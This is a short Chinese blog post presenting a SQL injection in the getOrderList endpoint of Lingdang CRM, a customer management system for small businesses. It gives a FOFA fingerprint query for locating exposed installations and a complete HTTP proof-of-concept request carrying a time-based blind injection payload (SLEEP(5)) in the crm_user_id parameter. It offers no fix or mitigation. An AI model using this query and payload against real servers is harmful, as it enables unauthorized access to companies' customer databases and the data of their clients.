当前位置：首页 > article >正文

漏洞挖掘---灵当CRM客户管理系统getOrderList SQL注入漏洞

article 2025/4/1 9:42:00

一、灵当CRM

灵当CRM是上海灵当信息科技有限公司旗下产品，适用于中小型企业。它功能丰富，涵盖销售、服务、财务等管理功能，具有性价比高、简洁易用、可定制、部署灵活等特点，能助力企业提升经营效益和客户满意度。

二、FOFA-Search...

body="ldcrm.base.js" && icon_hash="436310201"

三、POC

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=11%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))fiAG) HTTP/1.1
Host: ........
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

FROM IYU_

查看全文

http://www.kler.cn/a/622432.html